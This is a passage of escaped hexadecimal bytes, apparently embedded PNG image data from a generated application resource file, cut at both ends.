23\\x92\\xae\\xf5\\xc4\\x98\\x26\\\n\\xe9\\x49\\x45\\x28\\x46\\x11\\xb1\\x08\\x72\\x50\\x2e\\xd1\\xfa\\x3e\\xb9\\x0c\\\n\\xc4\\xaa\\x7c\\x39\\xfb\\x44\\x6f\\x8f\\x87\\x24\\x7d\\xb4\\x6e\\x60\\x6d\\x13\\\n\\xcb\\x5f\\xd6\\x7e\\x33\\x3b\\xa5\\x17\\xc7\\x74\\x49\\xd7\\x4b\\xba\\x53\\xee\\\n\\x25\\x68\\x83\\x78\\x56\\xd2\\x52\\xaf\\xdf\\x58\\x29\\xf7\\xb2\\x83\\x68\\x89\\\n\\xbd\\x0f\\x19\\x17\\x64\\x0c\\xdc\\xcc\\xec\\xe5\\x92\\xee\\x92\\xf4\\x69\\xe5\\\n\\x0f\\xe6\\x36\\x49\\x5a\\x66\\x66\\x87\\x33\\xe5\\xe6\\x49\\x7a\\x55\\xd2\\xec\\\n\\x9c\\xf3\\xa3\\x61\\xe8\\x04\\xc9\\x02\\x2c\\x94\\xbb\\x62\\x3e\\x25\\x37\\xb0\\\n\\xdb\\x21\\xe9\\x47\\x72\\x53\\x23\\xa3\\x99\\xf3\\x46\\xe4\\x26\\x0d\\x2f\\xc9\\\n\\xb3\\x13\\x13\\x43\\x2d\\x48\\x59\\x80\\x35\\xf2\\xa6\\x4b\\x62\\xa5\\xec\\x6c\\\n\\xef\\x50\\x82\\x4b\\x13\\x7d\\x50\\x43\\x22\\x46\\x11\\x43\\x2f\\x08\\x70\\xb6\\\n\\xa4\\x1f\\xab\\xd9\\x17\\xe4\\x74\\xc6\\xd0\\x09\\x02\\x7c\\x40\\xd2\\x7c\\xb9\\\n\\x79\\xa9\\x6b\\x24\\x2d\\xd5\\x10\\xd6\\xa3\\x1f\\x93\\xaa\\x0f\\x99\\x0c\\xc4\\\n\\x32\\x30\\x4c\\xf4\\x48\\x82\\x44\\x46\\x12\\x24\\x32\\xa2\\xed\\x0c\\x81\\xbd\\\n\\x1a\\xb2\\x89\\xc1\\x8a\\x1c\\x92\\x9b\\x69\\xb8\\xb7\\xf7\\xc4\\xb3\\xa4\\x74\\\n\\x85\\x74\\xc9\\x0c\\xb9\\x3c\\x86\\xad\\x64\\x92\\x02\\x93\\x20\\xdd\\x33\\x5b\\\n\\xd2\\x77\\xc7\\x36\\x92\\x20\\x71\\x30\\xfe\\x68\\x77\\x12\\x24\\x0e\\x66\\x8e\\\n\\x7d\\x49\\x82\\x44\\x46\\x12\\x24\\x32\\x92\\x20\\x91\\x91\\x04\\x89\\x83\\x3d\\\n\\x63\\x5f\\x92\\x20\\xdd\\xb3\\x47\\xd2\\xad\\x5d\\x07\\x91\\x48\\x24\\x12\\x89\\\n\\x44\\x22\\x91\\x48\\x24\\x12\\x89\\x44\\x22\\x8f\\xff\\x01\\x7f\\xeb\\xe7\\xa4\\\n\\x6f\\x5c\\xed\\x04\\x00\\x00\\x00\\x00\\x49\\x45\\x4e\\x44\\xae\\x42\\x60\\x82\\\n\\\n\\x00\\x00\\x6e\\xec\\\n\\x89\\\n\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0d\\x49\\x48\\x44\\x52\\x00\\\n\\x00\\x01\\xf4\\x00\\x00\\x01\\xf4\\x08\\x06\\x00\\x00\\x00\\xcb\\xd6\\xdf\\x8a\\\n\\x00\\x00\\x00\\x09\\x70\\x48\\x59\\x73\\x00\\x00\\x0e\\xc4\\x00\\x00\\x0e\\xc4\\\n\\x01\\x95\\x2b\\x0e\\x1b\\x00\\x00\\x6e\\x9e\\x49\\x44\\x41\\x54\\x78\\x5e\\xed\\\n\\x9d\\x07\\x58\\x54\\xc7\\x16\\xc7\\x77\\xe9\\x1d\\x04\\x14\\x54\\x54\\xec\\xbd\\\n\\x61\\xc3\\xde\\x7b\\x4b\\xa2\\x69\\x26\\xd1\\x3c\\x35\\x3d\\x26\\xb6\\x24\\xa6\\\n\\x69\\xa2\\x49\\x5e\\x8a\\xc6\\xc4\\x74\\xa3\\x26\\x9a\\x1e\\x35\\xb1\\x2b\\x8a\\\n\\xbd\\x61\\x43\\xb1\\x62\\x47\\x41\\xa5\\x08\\xd2\\x41\\xda\\xbe\\x33\\xeb\\xae\\\n\\x0f\\x11\\xd8\\xbb\\xbb\\xb7\\xdf\\x3f\\xdf\\xb7\\xae\\xb0\\x33\\x67\\xce\\xf9\\\n\\xcd\\xdd\\xfb\\xbf\\xd3\\xf5\\x3a\\xfc\\x80\\x00\\x08\\x48\\x4e\\x60\\xb8\\x41\\\n\\xa7\\x37\\x39\\xa1\\x2f\\x48\\xf3\\x09\\x28\\x48\\xf3\\xf5\\xa4\\x57\\x95\\xc2\\\n\\x54\\xdf\\x20\\xfa\\x3d\\xa8\\x20\\xd5\\xb7\\x3a\\xfd\\x5e\\x8d\\xde\\x83\\x0b\\\n\\x6e\\xf9\\x04\\x96\\xe4\\xbb\\x78\\x95\\x14\\x3a\\xb9\\x1b\\x8a\\x1c\\x5d\\x4b\\\n\\x8a\\x9c\\xdc\\x0c\\x85\\x8e\\xee\\x25\\x85\\xce\\x77\\x7e\\x2f\\xa4\\xdf\\x8b\\\n\\x1c\\x75\\x86\\x42\\x27\\x5d\\x51\\x8e\\xfb\\x3d\\xb1\\x39\\x79\\xe6\\xe9\\xf4\\\n\\xce\\x45\\x3a\\xbd\\x53\\xb1\\xce\\xc1\\xb9\\x28\\x9f\\xde\\x0b\\x1c\\x9c\\x0b\\\n\\xf3\\xf4\\xce\\xc5\\xb7\\x1d\\x9c\\x8a\\x6e\\xd3\\xef\\xb7\\xe9\\xef\\x79\\x0e\\\n\\xee\\xb7\\x33\\x5d\\xfc\\x33\\x92\\x5d\\x02\\x32\\xaf\\xd3\\x7b\\x12\\xbd\\x52\\\n\\x5c\\xfc\\x33\\xd9\\x7b\\x92\\x4b\\x40\\x46\\x2a\\xbd\\xe7\\x38\\x57\\xc9\\xba\\\n\\x45\\xc6\\x0d\\xec\\xb5\\x56\\x6f\\x7c\\xc7\\x0f\\x08\\x80\\x80\\x84\\x04\\xcc\\\n\\x37\\x11\\x09\\x5d\\x40\\xd1\\x20\\xa0\\x7e\\x02\\x66\\xc1\\xce\\xbd\\x1a\\x5c\\\n\\x23\\xff\\x5a\\xb5\\xfa\\x79\\x09\\xd5\\x1a\\xe4\\x5d\\xab\\x56\\x27\\x2f\\x3e\\\n\\x28\\x34\\xef\\x7a\\xd5\\x5a\\x05\\xa9\\x7e\\x24\\xda\\x3e\\x24\\xd8\\x7e\\x81\\\n\\x4a\\xa2\\xe1\\x12\\x90\\x7e\\x8b\\x44\\x3f\\x91\\xde\\xaf\\xbb\\xd7\\x48\\x89\\\n\\x77\\xaf\\x95\\x74\\xd9\\xbd\\x66\\xf2\\x15\\xf7\\x90\\xe4\\x0b\\xee\\x21\\x49\\\n\\x17\\xe9\\xf7\\x64\\x93\\xe8\\xeb\\x20\\xfa\\x4a\\xaa\\x59\\xf8\\xaa\\x44\\x02\\\n\\x10\\x74\\x25\\xd6\\x1a\\x7c\\x96\\x25\\x81\\x61\\x85\\x4e\\x2e\\x79\\xf1\\xd5\\\n\\xaa\\x93\\x50\\x93\\x60\\x07\\xd5\\xcb\\xbb\\x56\\x35\\x94\\xde\\x6b\\xd3\\xef\\\n\\xa1\\x24\\xdc\\x8d\\x6e\\x27\\xfb\\x07\\x19\\x8a\\x1d\\x64\\xe9\\xbb\\x50\\x4e\\\n\\xe9\\x1d\\x4b\\x74\\xae\\xd5\\xd2\\x92\\x49\\xd8\\xcf\\x91\\xd0\\x5f\\x26\\x91\\\n\\x67\\x62\\xcf\\x44\\xff\\x22\\xfd\\xff\\x92\\x7b\\x48\\x4a\\xe2\\x3a\\xe7\\xa2\\\n\\x42\\xa1\\xca\\x87\\x5d\\x10\\xd0\\x12\\x01\\x08\\xba\\x96\\x6a\\x1b\\xb1\\xda\\\n\\x4d\\xc0\\xd8\\xd2\\x36\\xe8\\x1d\\xa8\\x55\\x1d\\x9c\\x7d\\xbe\\x76\\xd3\\xec\\\n\\x73\\xb5\\x5b\\xd1\\x7b\\xb3\\x9c\\xf3\\xb5\\x9a\\xd1\\x7b\\x1b\\xea\\xe2\\xbe\\\n\\xb7\\x8f\\xdb\\xee\\x12\\xd5\\x6d\\x80\\x86\\x00\\x6e\\x7b\\x35\\xbc\\x7a\\xd4\\\n\\xb3\\x61\\xfc\\x29\\xef\\x46\\x57\\x4e\\xd2\\xfb\\x49\\xfa\\xfd\\x0c\\xb5\\xf6\\\n\\x13\\x75\\x7a\\x03\\xba\\xf3\\xd5\\x5d\\xfd\\x88\\x8e\\x67\\x02\\x10\\x74\\x9e\\\n\\x81\\xc2\\x9c\\xba\\x08\\x0c\\x4c\\xf5\\xad\\x96\\x11\\xd3\\x30\\x2c\\xfb\\x6c\\\n\\x1d\\xa3\\x70\\xd3\\xab\\x45\\xf6\\x85\\x5a\\xed\\x8a\\x73\\xdd\\xd4\\x15\\xa8\\\n\\xcc\\xa2\\x71\\xf4\\xc8\\xd7\\x79\\x35\\x88\\x3f\\x4c\\xe2\\x7e\\x82\\x5e\\xa7\\\n\\xbd\\x1a\\x5f\\x39\\xe6\\xdb\\xfa\\x7c\\x4c\\x44\\x40\\x46\\x8a\\xcc\\x5c\\x85\\\n\\x3b\\x20\\x20\\x1b\\x02\\x10\\x74\\xd9\\x54\\x05\\x1c\\x91\\x9a\\xc0\\xb0\\x22\\\n\\x07\\xa7\\xac\\xb3\\xa1\\x8d\\xd2\\xa3\\x9b\\xf4\\xa4\\x57\\x78\\xfa\\x91\\xa6\\\n\\x5d\\x73\\xaf\\x54\\xaf\\x2f\\xb5\\x5f\\x28\\xff\\xff\\x04\\x3c\\xea\\xdc\\xb8\\\n\\xe4\\xd7\\xee\\xcc\\x2e\\xbf\\xb0\\xd8\\xfd\\x55\\xda\\x9d\\xd9\\xe9\\xd5\\x38\\\n\\xee\\xa2\\xde\\xc1\\x50\\x8c\\xf1\\x79\\x5c\\x25\\x20\\xa0\\xbb\\x3b\\xb3\\x16\\\n\\x2c\\x40\\x40\\x73\\x04\\x06\\xdd\\xf2\\x0e\\x20\\xd1\\xee\\x78\\xeb\\x48\\xd3\\\n\\xee\\x24\\xe0\\x9d\\x32\\x8e\\x37\\xec\\x4a\\x2d\\x6f\\x57\\xcd\\x81\\x50\\x70\\\n\\xc0\\xd4\\x65\\x5f\\xec\\xdb\\xf6\\x6c\\x24\\x09\\xfc\\x01\\x12\\xf8\\x1d\\xbe\\\n\\xad\\xcf\\xc5\\x6c\\xaa\\x92\\x95\\xa6\\xe0\\x90\\xe0\\x3a\\x08\\xd8\\x4c\\x00\\\n\\x2d\\x74\\x9b\\xd1\\x21\\xa3\\xd2\\x08\\x0c\\xcd\\x77\\x71\\x4f\\x3b\\xd0\\xa2\\\n\\xf3\\xcd\\xdd\\x6d\\x07\\xa7\\xee\\x69\\xd3\\x2f\\x2b\\x36\\xb4\\x0d\\x8d\\x87\\\n\\x2b\\x2d\\x0c\\xf8\\x5b\\x19\\x01\\xbd\\x41\\xe7\\xdd\\x24\\xee\\x58\\x60\\xf7\\\n\\xa3\\x9b\\x02\\xe8\\xe5\\xdf\\xf1\\xd4\\x41\\x07\\xd7\\x82\\x7c\\xb4\\xe0\\x71\\\n\\xd9\\x68\\x81\\x00\\xee\\x66\\x5a\\xa8\\x65\\x8d\\xc6\\x38\\xac\\x58\\xef\\x98\\\n\\x75\\xba\\x5e\\x2b\\x12\\xef\\x81\\x37\\xf7\\xb4\\xed\\x73\\xeb\\x50\\xb3\\xfe\\\n\\x25\\xb7\\x5d\\x34\\x4a\\x43\\x9b\\x61\\x93\\x98\\xeb\\xaa\\x74\\x3c\\xb5\\x21\\\n\\xb0\\xdb\\xb1\\x1d\\x24\\xf0\\xeb\\xbd\\x9b\\x5c\\x3e\\xbb\\xce\\xd1\\x50\\xac\\\n\\x4d\\x1a\\x88\\x5a\\xed\\x04\\x20\\xe8\\x6a\\xaf\\x61\\x0d\\xc5\\xc7\\x66\\xa0\\\n\\xe7\\xdf\\x08\\xac\\x99\\xb2\\xa3\\xdd\\x90\\xd4\\x3d\\x6d\\xfb\\xa6\\xee\\x6b\\\n\\x3d\\xb0\\xf0\\x96\\xb7\\xaf\\x86\\x10\\x20\\x54\\x0b\\x04\\x68\\x33\\x9c\\xf4\\\n\\x80\\xae\\xc7\\x36\\x92\\xc0\\x6f\\x0d\\xec\\x79\\x64\\x93\\x5b\\xf5\\x9b\\xd7\\\n\\xd1\\x7a\\xc7\\x65\\xa3\\x16\\x02\\x10\\x74\\xb5\\xd4\\xa4\\x46\\xe3\\x18\\x9c\\\n\\xe9\\xe9\\x97\\xba\\xbf\\x65\\x4f\\xd6\\x85\\x9e\\xba\\xbb\\x6d\\xdf\\x9c\\xcb\\\n\\x35\\x9b\\x6a\\x14\\x05\\xc2\\xb6\\x81\\x80\\x67\\xdd\\x6b\\x67\\x03\\x7a\\x1c\\\n\\xdd\\x14\\xd8\\x8d\\xba\\xe7\\xc3\\x4f\\xee\\xdf\\xe8\\x93\\x93\\x61\\x83\\x19\\\n\\x64\\x01\\x01\\x59\\x10\\x80\\xa0\\xcb\\xa2\\x1a\\xe0\\x84\\x35\\x04\\x98\\x88\\\n\\x27\\xae\\xef\\x36\\xfa\\x06\\xbd\\xd2\\xf6\\xb7\\x1a\\xc8\\xb6\\x39\\xc5\\x0f\\\n\\x08\\xd8\\x4b\\x80\\xb6\\xbc\\xd5\\x51\\xb7\\xfc\\xaa\\xe0\\xa1\\xbb\\x57\\x04\\\n\\x0d\\x38\\xb0\\x9e\\xc4\\x3d\\xdd\\x5e\\x9b\\xc8\\x0f\\x02\\x62\\x12\\x80\\xa0\\\n\\x8b\\x49\\x1b\\x65\\xd9\\x4c\\x80\\x89\\x78\\xd2\\xe6\\xf0\\x07\\x49\\xc8\\x1f\\\n\\xa2\\x96\\xf8\\x50\\xda\\xaf\\x1c\\xd7\\xae\\xcd\\x34\\x91\\xd1\\x12\\x81\\x52\\\n\\xe2\\xbe\\x92\\xc4\\x7d\\x1d\\xc4\\xdd\\x12\\x31\\x7c\\x2e\\x07\\x02\\xb8\\x29\\\n\\xca\\xa1\\x16\\xe0\\x43\\xb9\\x04\\x86\\x64\\xbb\\x79\\x27\\x6e\\xea\\x3a\\x8a\\\n\\xb5\\xc6\\x49\\xc4\\x87\\x40\\xc4\\x71\\xa1\\x48\\x41\\xc0\\x24\\xee\\x6b\\xa9\\\n\\xe5\\xbe\\x3c\\x78\\xd0\\xbe\\x55\\x1b\\xbc\\xf2\\xb3\\xa4\\xf0\\x03\\x65\\x82\\\n\\x80\\x25\\x02\\x10\\x74\\x4b\\x84\\xf0\\xb9\\xa8\\x04\\x98\\x88\\x27\\x6f\\xed\\\n\\x34\\x2c\\x71\\x5d\\xf7\\xd1\\x29\\x3b\\xc3\\x86\\xd1\\xac\\x74\\x4c\\x4b\\x17\\\n\\xb5\\x06\\x50\\x58\\x65\\x04\\xd8\\xac\\xf9\\xaa\\x3d\\xa3\\x97\\x07\\x0f\\xdf\\\n\\xf5\\x57\\xb5\\x3e\\x07\\x23\\x48\\xdc\\xb3\\x41\\x0c\\x04\\xe4\\x42\\x00\\x82\\\n\\x2e\\x97\\x9a\\xd0\\xb0\\x1f\\x6c\\x76\\xfa\\xad\\x83\\xcd\\xbb\\x26\\xfc\\x35\\\n\\x70\\x3c\\xb5\\xc6\\xc7\\x16\\xe7\\xbb\\x60\\x50\\x5c\\xc3\\xd7\\x83\\x52\\x42\\\n\\x77\\x74\\x2b\\xd0\\x05\\x0f\\xdd\\xb3\\x28\\xe4\\xb1\\x4d\\x4b\\xaa\\x74\\x38\\\n\\x1d\\x85\\xd9\\xf2\\x4a\\xa9\\x39\\xf5\\xfa\\x09\\x41\\x57\\x6f\\xdd\\xca\\x3e\\\n\\x32\\xda\\xa9\\x2d\\xf0\\xfa\\x3f\\xbd\\xc7\\xc5\\xff\\x35\\x70\\x2c\\xdb\\x2b\\\n\\x5d\\xf6\\x0e\\xc3\\x41\\x10\\xa8\\x80\\x00\\xed\\x35\\x1f\\x5d\\xeb\\xb1\\x88\\\n\\x9f\\x6b\\x3c\\xb8\\xfd\\x77\\xda\\xa9\\x2e\\x15\\xa0\\x40\\x40\\x0a\\x02\\x10\\\n\\x74\\x29\\xa8\\x6b\\xb8\\x4c\\x6a\\x8d\\x3b\\xa4\\xee\\x6d\\xdd\\x37\\xe1\\x8f\\\n\\x41\\x13\\x68\\x92\\xdb\\x23\\x25\\x05\\xce\\xb8\\x06\\x35\\x7c\\x3d\\xa8\\x2d\\\n\\x74\\x07\\x97\\x42\\x5d\\xd0\\xc0\\xfd\\xbf\\x85\\x3c\\x1e\\xb1\\x38\\xa0\\x4b\\\n\\xcc\\x0e\\xb4\\xda\\xd5\\x56\\xc3\\xf2\\x8e\\x07\\x37\\x53\\x79\\xd7\\x8f\\x6a\\\n\\xbc\\x1b\\x78\\xd3\\x2f\\xf8\\xda\\x8a\\xbe\\xff\\x49\\xf8\\x73\\xc0\\x38\\x5a\\\n\\x2b\\xde\\x58\\x35\\x81\\x21\\x10\\x10\\xa8\\x80\\x00\\xad\\x71\\x3f\\xcd\\x84\\\n\\xbd\\xe6\\xa8\\x6d\\xbf\\x46\\x04\\xa6\\x27\\x03\\x14\\x08\\x08\\x4d\\x00\\x82\\\n\\x2e\\x34\\x61\\x8d\\xdb\\xef\\x79\\xb2\\x7e\\xbb\\xb8\\x1f\\x1f\\x7c\\xf5\\xc6\\\n\\xba\\x6e\\x4f\\x19\\x8a\\x9c\\x34\\x4e\\x03\\xe1\\x6b\\x91\\x80\\xde\\xa9\\x48\\\n\\x57\\x7d\\xf8\\xee\\x9f\\x42\\x27\\xae\\xfa\\x62\\x67\\x8b\\x8b\\xc7\\xb5\\xc8\\\n\\x00\\x31\\x8b\\x43\\x00\\x82\\x2e\\x0e\\x67\\x4d\\x95\\x32\\xbc\\x44\\xef\\x98\\\n\\x1c\\xd9\\xe9\\xa1\\xb8\\x45\\x0f\\xbc\\x48\\x87\\xa1\\xf4\\xd2\\x54\\xf0\\x08\\\n\\x16\\x04\\x2a\\x21\\xe0\\xdf\\xe9\\x64\\x44\\xe8\\xc4\\x7f\\xbf\\xa9\\xd6\\xef\\\n\\xe0\\xfa\\xb5\\x0e\\x86\\x12\\xc0\\x02\\x01\\x3e\\x09\\x40\\xd0\\xf9\\xa4\\xa9\\\n\\x71\\x5b\\x43\\x72\\x5d\\xbd\\xae\\x2d\\xef\\x3f\\x21\\xee\\xa7\\x11\\x2f\\xe5\\\n\\x5e\\xae\\xd1\\x50\\xe3\\x38\\x10\\x3e\\x08\\x54\\x48\\xc0\\xa3\\xee\\xf5\\xb3\\\n\\xa1\\xe3\\x57\\x7f\\x59\\x73\\x74\\xe4\\xb2\\x0d\\x1e\\xb7\\x73\\x80\\x0a\\x04\\\n\\xf8\\x20\\x00\\x41\\xe7\\x83\\xa2\\xc6\\x6d\\x0c\\x48\\xf4\\x0f\\xb9\\xf2\\xf3\\\n\\xf0\\x49\\xf1\\xbf\\x0f\\x7e\\xae\\x30\\xc3\\x0b\\x87\\xa1\\x68\\xfc\\x7a\\x40\\\n\\xf8\\xdc\\x09\\x38\\xfb\\x66\\x67\\xd7\\x1a\\xb3\\xf1\\xcb\\x3a\\x4f\\xaf\\xfd\\\n\\x7a\\x73\\x70\\x5a\\x22\\xf7\\x9c\\x48\\x09\\x02\\xf7\\x13\\x80\\xa0\\xe3\\xaa\\\n\\xb0\\x99\\x40\\xf7\\xe8\\x26\\xe1\\x57\\x97\\x0e\\x7b\\x89\\xc6\\xc7\\x9f\\xc4\\\n\\xf8\\xb8\\xcd\\x18\\x91\\x11\\x04\\x74\\xa6\\x71\\xf6\\x25\\x34\\xce\\xfe\\x39\\\n\\x8d\\xb3\\x9f\\x02\\x12\\x10\\xb0\\x85\\x00\\x04\\xdd\\x16\\x6a\\x1a\\xcf\\x43\\\n\\x42\\xde\\xf5\\xc2\\x17\\x8f\\xbf\\x7d\\x73\\x67\\xbb\\xc1\\x1a\\x47\\x81\\xf0\\\n\\x41\\x80\\x77\\x02\\x74\\xac\\xeb\\xbf\\x0d\\x26\\xff\\xf1\\xd1\\xee\\xb0\\xd8\\\n\\xc3\\xbc\\x1b\\x87\\x41\\x55\\x13\\x80\\xa0\\xab\\xba\\x7a\\xf9\\x0d\\x8e\\x84\\\n\\xbc\\x1b\\x09\\xf9\\x5b\\x10\\x72\\x7e\\xb9\\xc2\\x1a\\x08\\x94\\x47\\x80\\x84\\\n\\x7d\\xb5\\x49\\xd8\\x0f\\x82\\x10\\x08\\x70\\x21\\x00\\x41\\xe7\\x42\\x49\\xe3\\\n\\x69\\xd0\\x22\\xd7\\xf8\\x05\\x80\\xf0\\x25\\x25\\x60\\x6a\\xb1\\x7f\\x48\\x2d\\\n\\xf6\\x23\\x92\\x3a\\x82\\xc2\\x65\\x4f\\x00\\x82\\x2e\\xfb\\x2a\\x92\\xce\\x41\\\n\\x12\\xf2\\x2e\\xa6\\xae\\xf5\\x21\\xd2\\x79\\x81\\x92\\x41\\x00\\x04\\x18\\x01\\\n\\xd6\\x62\\x6f\\xf4\\xfa\\xb2\\x59\\x34\\xc6\\x1e\\x03\\x22\\x20\\x50\\x1e\\x01\\\n\\x08\\x3a\\xae\\x8b\\xfb\\x08\\xb0\\xcd\\x60\\xce\\x7d\\x3a\\x76\\x36\\x75\\xad\\\n\\x43\\xc8\\x71\\x7d\\x80\\x80\\x9c\\x08\\xe8\\x0d\\xba\\xa0\\xfe\\x07\\xfe\\xaa\\\n\\xff\\xea\\x1f\\x1f\\x92\\xb0\\x9f\\x90\\x93\\x6b\\xf0\\x45\\x7a\\x02\\x10\\x74\\\n\\xe9\\xeb\\x40\\x36\\x1e\\xf4\\x8b\\x0f\\xaa\\x4b\\x42\\x3e\\xe7\\xc6\\xda\\x1e\\\n\\x4f\\xe8\\x0c\\xb8\\x34\\x64\\x53\\x31\\x70\\x04\\x04\\xca\\x12\\x20\\x61\\xaf\\\n\\x3e\\x7c\\xd7\\x32\\x6a\\xb1\\xbf\\x13\\x59\\x2b\\x29\\x1e\\x80\\x40\\x80\\x11\\\n\\xc0\\x5d\\x1b\\xd7\\x81\\x6e\\x70\\xb6\\xbb\\xef\\x85\\x2f\\xc6\\xcc\\xba\\xfa\\\n\\xf3\\xf0\\x29\\x25\\x85\\xd8\\x9e\\x15\\x97\\x04\\x08\\x28\\x85\\x00\\x3b\\x0c\\\n\\x86\\xd6\\xb0\\x7f\\x4c\\x2d\\xf6\\x8f\\x36\\x7a\\xe5\\x65\\x29\\xc5\\x6f\\xf8\\\n\\x29\\x0c\\x01\\x08\\xba\\x30\\x5c\\x15\\x61\\x75\\x58\\xa1\\xa3\\x4b\\xc2\\x5f\\\n\\x03\\x9e\\x3d\\xff\\xf9\\x13\\xb3\\x0a\\x52\\xfd\\x02\\x15\\xe1\\x34\\x9c\\x04\\\n\\x01\\x10\\xb8\\x8f\\x80\\x4b\\x40\\x7a\\x72\\xc3\\x69\\xbf\\xbd\\x13\\xf2\\xc8\\\n\\xe6\\x9f\\xd7\\x39\\x17\\x17\\x02\\x91\\x36\\x09\\x40\\xd0\\x35\\x58\\xef\\x74\\\n\\x84\\xa9\\x3e\\x39\\xb2\\xe3\\xe8\\xb3\\xff\\x1d\\xff\\x5e\\xce\\xc5\\x90\\x66\\\n\\x1a\\x44\\x80\\x90\\x41\\x40\\x95\\x04\\xe8\\x84\\xb7\\x93\\xcd\\xe6\\x7c\\x37\\\n\\x6d\\x5f\\xf7\\x63\\x9b\\x55\\x19\\x20\\x82\\xaa\\x94\\x00\\x04\\x5d\\x63\\x17\\\n\\x48\\xef\\xd8\\x3a\\xad\\x4f\\xbd\\xfd\\xd2\\x82\\x5b\\x87\\x9b\\xf5\\xd0\\x58\\\n\\xe8\\x08\\x17\\x04\\x34\\x43\\x20\\xa0\\xdb\\xb1\\x0d\\x4d\\xdf\\xfd\\xf1\\xf5\\\n\\xed\\x4d\\xae\\x60\\xd7\\x39\\xcd\\xd4\\x3a\\xc6\\xd0\\x35\\x53\\xd5\\x6c\\xbf\\\n\\xf5\\x73\\x73\\xc7\\xce\\xba\\xbe\\xb2\\xef\\x44\\x43\\x09\\x9e\\xe3\\x34\\x53\\\n\\xf1\\x08\\x54\\xb3\\x04\\xf4\\x0e\\x06\\x1d\\x1d\\xfe\\xf2\\x5d\\xa3\\x19\\x3f\\\n\\xcf\\x8a\\x08\\xc8\\x48\\xd1\\x2c\\x08\\x0d\\x05\\x8e\\x3b\\xbb\\xca\\x2b\\x7b\\\n\\x48\\x9e\\x8b\\xe7\\xa5\\x6f\\x1e\\x79\\x33\\x6e\\xd1\\x83\\xaf\\x17\\xe7\\xb9\\\n\\x3a\\xab\\x3c\\x5c\\x84\\x07\\x02\\x20\\x50\\x86\\x80\\x93\\x67\\x5e\\x41\\xbd\\\n\\x97\\xfe\\x7e\\xb7\\xce\\xf8\\xd5\\x5f\\x6f\\x70\\x2f\\xc8\\x05\\x20\\xf5\\x12\\\n\\x80\\xa0\\xab\\xb7\\x6e\\x75\\xdd\\x0e\\x34\\xef\\x73\\x7c\\xca\\xb4\\x9f\\xf2\\\n\\xae\\x55\\xab\\xad\\xe2\\x30\\x11\\x1a\\x08\\x80\\x00\\x07\\x02\\xee\\x21\\x49\\\n\\xb1\\x2d\\xe7\\x7e\\xf1\\xe2\\xde\\xce\\x27\\xb6\\x73\\x48\\x8e\\x24\\x0a\\x24\\\n\\x00\\x41\\x57\\x60\\xa5\\x59\\x72\\x79\\x70\\xa6\\x67\\x95\\xb3\\x1f\\x3f\\xfd\\\n\\x61\\xfc\\xef\\x83\\x5e\\xc0\\x7a\\x72\\x4b\\xb4\\xf0\\x39\\x08\\x68\\x88\\x00\\\n\\xad\\x5f\\xaf\\xfd\\xc4\\xc6\\xaf\\x1a\\xbf\\xb5\\xe4\\xad\\x0d\\x9e\\xf9\\xd9\\\n\\x1a\\x8a\\x5c\\x13\\xa1\\x42\\xd0\\x55\\x56\\xcd\\x9d\\x77\\xb5\\x1d\\x76\\x62\\\n\\xda\\x94\\xef\\x6f\\x27\\xfb\\xd7\\x54\\x59\\x68\\x08\\x07\\x04\\x40\\x80\\x27\\\n\\x02\\xd4\\x5a\\xbf\\xd8\\xec\\x83\\xef\\xa6\\x44\\xf5\\x3e\\xbc\\x96\\x27\\x93\\\n\\x30\\x23\\x03\\x02\\x10\\x74\\x19\\x54\\x02\\x1f\\x2e\\x0c\\x4c\\xf5\\xa9\\x76\\\n\\xf6\\xc3\\x89\\x9f\\x5c\\x5b\\xd9\\xe7\\x69\\x3e\\xec\\xc1\\x06\\x08\\x80\\x80\\\n\\xfa\\x09\\xd4\\x1c\\xb5\\x75\\x51\\x93\\x59\\x0b\\x5f\\xdb\\xe4\\x9b\\x93\\xae\\\n\\xfe\\x68\\xd5\\x1f\\x21\\x04\\x5d\\x05\\x75\\xdc\\x31\\x22\\xfc\\xe1\\x53\\x33\\\n\\x5e\\xf9\\xa1\\x20\\xcd\\xa7\\x8a\\x0a\\xc2\\x41\\x08\\x20\\x00\\x02\\x22\\x12\\\n\\x70\\x0d\\x4a\\x4b\\x68\\x3a\\xeb\\x87\\x69\\x87\\x86\\xee\\xfd\\x5b\\xc4\\x62\\\n\\x51\\x94\\x00\\x04\\x20\\xe8\\x02\\x40\\x15\\xcb\\x24\\x6b\\x95\\x93\\x90\\x7f\\\n\\x9b\\xb4\\x39\\x7c\\x94\\x58\\x65\\xa2\\x1c\\x10\\x00\\x01\\x75\\x12\\x08\\x1e\\\n\\xb2\\xf7\\xf7\\x66\\x1f\\x7c\\x3b\\x85\\x96\\xb8\\x25\\xab\\x33\\x42\\xf5\\x47\\\n\\x05\\x41\\x57\\x68\\x1d\\xb7\\x5f\\xd3\\x63\\xdc\\x99\\x59\\xcf\\xcf\\xa3\\x56\\\n\\x79\\x80\\x42\\x43\\x80\\xdb\\x20\\x00\\x02\\x32\\x23\\xe0\\xe2\\x9f\\x71\\x8b\\\n\\x44\\xfd\\x45\\x6a\\xad\\xff\\x29\\x33\\xd7\\xe0\\x0e\\x07\\x02\\x10\\x74\\x0e\\\n\\x90\\xe4\\x94\\x64\\x48\\xb6\\x9b\\xcf\\x99\\x39\\xcf\\x7c\\x96\\xf0\\xe7\\xc0\\\n\\x67\\xe5\\xe4\\x17\\x7c\\x01\\x01\\x10\\x50\\x0f\\x81\\x5a\\x63\\x36\\x7d\\xd7\\\n\\xe4\\xed\\x45\\x6f\\x6c\\xf0\\xca\\xc7\\x81\\x2f\\x0a\\xaa\\x56\\x08\\xba\\x82\\\n\\x2a\\xab\\xfb\\xe1\\xa6\\x3d\\xd8\\xba\\xf2\\xdc\\xab\\xc1\\xf5\\x14\\xe4\\x36\\\n\\x5c\\x05\\x01\\x10\\x50\\x20\\x01\\x8f\\xda\\x89\\x67\\x5b\\xcd\\x9f\\x37\\x71\\\n\\x77\\xfb\\x33\\x7b\\x14\\xe8\\xbe\\x26\\x5d\\x86\\xa0\\x2b\\xa0\\xda\\x87\\x15\\\n\\x3a\\xb9\\x9e\\x9f\\x3f\\xe6\\xfd\\xcb\\xdf\\x8f\\x7e\\xc3\\x50\\xec\\xa0\\x00\\\n\\x8f\\xe1\\x22\\x08\\x80\\x80\\x1a\\x08\\xe8\\x1d\\x4b\\x74\\xb4\\xcb\\xdc\\x9c\\\n\\x06\\xaf\\xfe\\x3e\\x7b\\x9d\\x53\\x49\\x91\\x1a\\x62\\x52\\x73\\x0c\\x10\\x74\\\n\\x99\\xd7\\x6e\\xdf\\x2b\\xc1\\x0d\\x8f\\xb